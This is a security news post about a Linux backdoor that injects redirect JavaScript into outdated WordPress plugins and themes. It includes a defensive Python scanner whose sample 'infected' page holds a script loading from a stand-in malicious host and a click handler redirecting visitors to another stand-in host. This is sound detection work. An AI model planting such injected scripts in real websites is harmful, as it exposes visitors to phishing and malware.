Linux backdoor malware infects WordPress-powered websites

January 9, 2023 - TuxCare PR Team

Dr.Web has discovered Linux.BackDoor.WordPressExploit.1, a backdoor that compromises websites built on the WordPress CMS. It exploits 30 known vulnerabilities in various WordPress plugins and themes.

When a site runs outdated versions of these add-ons that lack the relevant fixes, the backdoor injects malicious JavaScript into the targeted pages. As a result, visitors are redirected to another site whenever they click anywhere on an affected page.

The Trojan is built for 32-bit Linux but also runs on 64-bit systems. Its primary function is to compromise WordPress sites and inject malicious JavaScript into their pages, and it does so by exploiting known vulnerabilities in outdated plugins and themes.

The targeted plugins and themes include: WP Live Chat Support Plugin, WordPress – Yuzo Related Posts, Yellow Pencil Visual Theme Customizer Plugin, Easysmtp, WP GDPR Compliance Plugin, Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972), Thim Core, Google Code Inserter, Total Donations Plugin, Post Custom Templates Lite, WP Quick Booking Manager, Facebook Live Chat by Zotabox, Blog Designer WordPress Plugin, WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233), WP-Matomo Integration (WP-Piwik), WordPress ND Shortcodes For Visual Composer, WP Live Chat, Coming Soon Page and Maintenance Mode, Hybrid, Brizy WordPress Plugin, FV Flowplayer Video Player, WooCommerce, WordPress Coming Soon Page, WordPress theme OneTone, Simple Fields WordPress Plugin, WordPress Delucks SEO plugin, Poll, Survey, Form & Quiz Maker by OpinionStage, Social Metrics Tracker, WPeMatico RSS Feed Fetcher, and Rich Reviews.

Dr.Web's post of 30 December 2022 states: “If sites use outdated versions of such add-ons, lacking crucial fixes, the targeted webpages are injected with malicious JavaScripts.”

When a visitor opens a compromised WordPress page and clicks on it, they are redirected to a site of the attacker's choosing, which may host phishing content, malware downloads, or other malicious activity.

Such redirect chains help the operators' phishing, malware-distribution and malvertising campaigns evade detection and blocking. It is also possible that the auto-injector's operators sell their services to other cybercriminals.

The backdoor carries out these attacks by exploiting known vulnerabilities in the outdated plugins and themes listed above. Its operators control it remotely, and the JavaScript it injects is fetched from remote servers.
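To check a site you administer for this kind of injection, here is an added example (my own code, not Dr.Web's or TuxCare's): a small Python triage scanner that parses a page's HTML and flags three indicators consistent with the behaviour described above. The sample pages, the host names (blog.example.test, stat.example-bad.test, go.example-bad.test) and the indicator heuristics are constructed for the example; they are not published indicators from the Dr.Web analysis.

```python
"""Triage scanner for injected click-redirect JavaScript in WordPress pages.

Added example, not code from Dr.Web or TuxCare. It flags three indicators:
  1. <script src=...> loading from a host that is neither the site's own
     nor on an allowlist you maintain,
  2. an inline script that registers a click handler and then navigates
     (location assignment, location.replace/assign), the behaviour the
     article describes,
  3. a <script> tag before the page's <!DOCTYPE>/<html>, where a healthy
     WordPress theme emits nothing.
All three are this example's own heuristics, not published IOCs.
"""
import re
import sys
from html.parser import HTMLParser
from urllib.parse import urlparse

# A click handler followed within 400 characters by a navigation call.
CLICK_REDIRECT = re.compile(
    r"(onclick\s*=|addEventListener\s*\(\s*['\"]click['\"]|\.on\s*\(\s*['\"]click['\"])"
    r"[\s\S]{0,400}?"
    r"(window\.|document\.|top\.)?location(\.href)?\s*(=[^=]|\.(replace|assign)\s*\()",
    re.IGNORECASE,
)


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src=...>
        self.inline = []        # bodies of <script>...</script> blocks
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def scan_page(html, own_hosts, allow_hosts=()):
    """Return [(indicator, detail), ...] for one page; an empty list means clean."""
    findings = []
    if re.match(r"\s*<script\b", html, re.IGNORECASE):
        findings.append(("script-before-html", html.strip()[:80]))
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    trusted = {h.lower() for h in (*own_hosts, *allow_hosts)}
    for src in parser.external:
        host = urlparse(src).hostname    # None for relative paths such as /wp-includes/...
        if host and host.lower() not in trusted:
            findings.append(("external-script", src))
    for body in parser.inline:
        m = CLICK_REDIRECT.search(body)
        if m:
            findings.append(("click-redirect", body[m.start():m.end()][:120]))
    return findings


# Constructed sample pages for this example (not captured from a real incident).
CLEAN_PAGE = """<!DOCTYPE html><html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://blog.example.test/wp-content/themes/demo/app.js"></script>
<script>document.addEventListener('DOMContentLoaded',function(){console.log('ok');});</script>
</head><body><p>Hello</p></body></html>"""

INFECTED_PAGE = """<script src="https://stat.example-bad.test/js/r.js"></script>
<script>document.addEventListener('click',function(){window.location='https://go.example-bad.test/?u='+encodeURIComponent(location.href);});</script>
<!DOCTYPE html><html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
</head><body><p>Hello</p></body></html>"""


def main(argv):
    """Usage: scan.py OWN_HOST page.html [...]; with no arguments, scan the samples."""
    if len(argv) > 2:
        own = {argv[1]}
        pages = [(p, open(p, encoding="utf-8", errors="replace").read()) for p in argv[2:]]
    else:
        own = {"blog.example.test"}
        pages = [("CLEAN_PAGE", CLEAN_PAGE), ("INFECTED_PAGE", INFECTED_PAGE)]
    for name, html in pages:
        hits = scan_page(html, own)
        print(f"{name}: {'clean' if not hits else str(len(hits)) + ' finding(s)'}")
        for kind, detail in hits:
            print(f"  [{kind}] {detail}")


if __name__ == "__main__":
    main(sys.argv)
```

Run it over the HTML that visitors actually receive (for example the output of `curl -s` against the front page and a few posts), not only over files on disk, since the injection may live in the database (post content, widgets, options) rather than in theme files. Legitimate third-party scripts such as a CDN or analytics host will show up as external-script hits; add those hosts to `allow_hosts` after checking them. The scanner is a triage aid: a hit tells you where to look, and a clean result does not prove the site is uncompromised.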

In the same post, Dr.Web noted that each of the variants it analysed contains “unimplemented functionality for hacking the administrator accounts of targeted websites using a brute-force attack—by applying known logins and passwords, using special vocabularies.” If this feature is completed in a future version, the backdoor could compromise sites whose plugins are fully patched, by guessing weak administrator credentials rather than exploiting a plugin vulnerability.

The operators control the Trojan through its command and control (C&C) server, which tells it which website to attack. They can also switch the malware to standby mode, shut it down, or pause the logging of its actions; the brute-force code for administrator accounts noted above remains dormant in the analysed samples.

To defend against this threat, WordPress administrators should update every theme and plugin to the latest available version and replace those that are no longer maintained with supported alternatives. Because the injected script lives in the site's own pages, patching alone does not clean a site that has already been compromised: inspect the served HTML, theme files and database content for unexpected scripts and remove them, and reset administrator credentials while you are at it.

The sources for this piece include an article in BleepingComputer.

Watch this news on our Youtube Channel: https://www.youtube.com/watch?v=S-KO8QIcdIk
